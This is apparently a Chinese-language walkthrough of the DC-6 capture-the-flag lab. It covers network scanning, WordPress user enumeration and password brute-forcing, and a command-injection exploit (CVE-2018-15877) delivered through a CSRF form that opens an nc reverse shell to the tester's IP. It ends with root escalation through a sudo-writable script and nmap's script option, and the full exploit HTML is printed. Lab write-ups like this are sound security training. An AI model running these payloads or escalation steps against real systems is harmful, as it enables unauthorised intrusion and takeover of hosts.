渗透测试—DC_6
一、主机发现及端口扫描
root@kali:~/Desktop/valecalida's_Sript# python3 ARP_Scan.py -i eth0 10.87.51.0/24
[..] Making ARP scan...
IP: 10.87.51.2 MAC:00:50:56:ea:29:0e
IP: 10.87.51.1 MAC:00:50:56:c0:00:08
IP: 10.87.51.30 MAC:00:0c:29:b8:38:74
IP: 10.87.51.254 MAC:00:50:56:fe:7f:66
[+] Cost about 3.228038787841797 s这里发现了主机 10.87.51.30 为本次的测试目标
root@kali:~# nmap -A 10.87.51.30
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:18 EDT
Nmap scan report for 10.87.51.30
Host is up (0.00084s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:B8:38:74 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel这里发现目标主机开放了 22 端口跟常用的 80 端口,而且这里看到了这样的信息
Did not follow redirect to http://wordy/个人觉得是没法直接访问,于是在 /etc/hosts 文件里添加了下面的内容
10.87.51.30 wordy然后就可以正常访问页面了,很明显是一个 WordPress 站点
二、渗透测试流程
使用 whatweb 识别一下版本,当然也可以直接用 wpscan 识别
root@kali:~# whatweb 10.87.51.30
http://10.87.51.30 [301 Moved Permanently] Apache[2.4.25], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.87.51.30], RedirectLocation[http://wordy/], UncommonHeaders[x-redirect-by]
http://wordy/ [200 OK] Apache[2.4.25], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.87.51.30], JQuery[1.12.4], MetaGenerator[WordPress 5.1.1], PoweredBy[WordPress], Script[text/javascript], Title[Wordy – Just another WordPress site], UncommonHeaders[link], WordPress[5.1.1] 发现 WordPress 的版本是 5.1.1,使用 wpscan 进行目录扫描,这里只放个人觉得有用的信息
root@kali:~# wpscan --url http://wordy
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).使用插件检测在仔细检测一下
root@kali:~# wpscan --url http://wordy --plugins-detection aggressive
[+] akismet
| Location: http://wordy/wp-content/plugins/akismet/
| Latest Version: 4.1.5
| Last Updated: 2020-04-29T13:02:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://wordy/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.
[+] plainview-activity-monitor
| Location: http://wordy/wp-content/plugins/plainview-activity-monitor/
| Last Updated: 2018-08-26T15:08:00.000Z
| Readme: http://wordy/wp-content/plugins/plainview-activity-monitor/readme.txt
| [!] The version is out of date, the latest version is 20180826
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://wordy/wp-content/plugins/plainview-activity-monitor/, status: 200
|
| Version: 20161228 (50% confidence)
| Found By: Readme - ChangeLog Section (Aggressive Detection)
| - http://wordy/wp-content/plugins/plainview-activity-monitor/readme.txt
[+] user-role-editor
| Location: http://wordy/wp-content/plugins/user-role-editor/
| Last Updated: 2020-03-22T13:20:00.000Z
| Readme: http://wordy/wp-content/plugins/user-role-editor/readme.txt
| [!] The version is out of date, the latest version is 4.53.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://wordy/wp-content/plugins/user-role-editor/, status: 200
|
| Version: 4.24 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://wordy/wp-content/plugins/user-role-editor/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==================> (21 / 21) 100.00% Time: 00:00:00这里检测到了 plainview-activity-monitor 与 user-role-editor 这两个,先记录下。然后枚举一下该目标主机上可能存在的用户,这里省略一些多余的描述,把这些用户保存到字典中去。
root@kali:~# wpscan --url http://wordy --enumerate u
[+] admin
[+] graham
[+] mark
[+] sarah
[+] jens可以发现得到了五个用户,然后使用 cewl 来生成字典
root@kali:~# cewl http://wordy -w pass.dic
root@kali:~# wc -l pass.dic
89 pass.dic可以看到,这里生成了 89 条密码信息,然后使用刚才的账户挨着爆破一下
root@kali:~# wpscan --url http://wordy -U user.dic -P pass.dic
#没爆破出来,换个字典,嘤嘤嘤,准备用kali自带的rockyou.txt,不过可能要花点时间了
root@kali:~# wpscan --url http://wordy -U user.dic -P Desktop/rockyou.txt
[SUCCESS] - mark / helpdesk01得到了 mark / helpdesk01 ,后来发现有提示,没仔细审题真的是….
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt因为 WordPress 默认的管理地址就是 wp-login.php ,所以直接访问,使用得到的用户名密码登录
http://wordy/wp-login.php登录进去没发现什么信息,而且用得到的用户名密码登录 SSH 也失败了,所以转过头来看看插件这一块有没有什么漏洞
root@kali:~# searchsploit plainview activity monitor
Exploit Title | Path | (/usr/share/exploitdb/)
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection | exploits/php/webapps/45274.html
Shellcodes: No Result这里发现了一个命令注入漏洞,只不过没有直接可用的 shellcode ,跟着提示去找找看
root@kali:~# searchsploit -m 45274.html
Exploit: WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection
URL: https://www.exploit-db.com/exploits/45274
Path: /usr/share/exploitdb/exploits/php/webapps/45274.html
File Type: HTML document, ASCII text, with CRLF line terminators
Copied to: /root/45274.html这里查看一下这个文件,这里只贴重要的部分,代码贴到文章尾
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />这里我们需要更改几处:
#localhost:8000 ——> wordy
#127.0.0.1 ——> 10.87.51.17
#删除-nlvp然后访问对应的文件,然后点击即可
然后就可以看到已经通过 nc 连接上了
root@kali:~# nc -lvp 9999
listening on [any] 9999 ...
connect to [10.87.51.17] from wordy [10.87.51.30] 33976
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)改善一下 shell 环境
python -c 'import pty;pty.spawn("/bin/bash")'查看家目录下的用户信息,发现有四个用户
www-data@dc-6:/home$ ls -l
ls -l
total 16
drwxr-xr-x 2 graham graham 4096 Apr 26 2019 graham
drwxr-xr-x 2 jens jens 4096 Apr 26 2019 jens
drwxr-xr-x 3 mark mark 4096 Apr 26 2019 mark
drwxr-xr-x 2 sarah sarah 4096 Apr 24 2019 sarah查看用户目录下的文件,发现了一个 backups.sh 跟一个 stuff ,分别查看文件内容
www-data@dc-6:/home$ ls jens graham mark sarah
ls jens graham mark sarah
graham:
jens:
backups.sh
mark:
stuff
sarah:
www-data@dc-6:/home/jens$ cat backups.sh
cat backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
www-data@dc-6:/home$ cd mark/stuff
cd mark/stuff
www-data@dc-6:/home/mark/stuff$ ls
ls
things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
cat things-to-do.txt
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement这里给出了一个用户:graham ,密码是:GSo7isUM1D4 ,使用 ssh 登录一下
C:\>ssh graham@10.87.51.30
graham@10.87.51.30's password:
Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
graham@dc-6:~$ id
uid=1001(graham) gid=1001(graham) groups=1001(graham),1005(devs)发现可以正常登录,测试一下能否使用 sudo
graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh这里提示了 /home/jens/backups.sh 这个文件可以执行,在文件中添加 /bin/bash
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
/bin/bash然后发现权限不够,而且用户已经变为 jens
graham@dc-6:~$ sudo -u jens /home/jens/backups.sh
tar: Removing leading `/' from member names
tar (child): backups.tar.gz: Cannot open: Permission denied
tar (child): Error is not recoverable: exiting now
tar: backups.tar.gz: Wrote only 4096 of 10240 bytes
tar: Child returned status 2
tar: Error is not recoverable: exiting now
jens@dc-6:/home/graham$再测试一下 sudo
jens@dc-6:/home/graham$ sudo -l
Matching Defaults entries for jens on dc-6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jens may run the following commands on dc-6:
(root) NOPASSWD: /usr/bin/nmap又获得到了新信息,用户 jens 可以以root权限运行 nmap
jens@dc-6:/home/graham$ TF=$(mktemp)
jens@dc-6:/home/graham$ echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:/home/graham$ sudo nmap --script=$TF
Starting Nmap 7.40 ( https://nmap.org ) at 2020-05-01 14:18 AEST
NSE: Warning: Loading '/tmp/tmp.gJqAfenpuY' -- the recommended file extension is '.nse'.
# uid=0(root) gid=0(root) groups=0(root)
# /bin/sh: 2: 菜刀/root: not found
# # theflag.txt
#
Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)
Congratulations!!!
Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.45274文件内容为:
root@kali:~# cat 45274.html
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)
Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list
Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.
References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/
PoC:
-->
<html>
<!-- Wordpress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: LydA(c)ric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc 10.87.51.17 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Additons
https://diaryof0x41.wordpress.com/2019/05/29/vulnhub-dc-6-walkthrough/
https://www.hackingarticles.in/dc6-lab-walkthrough/
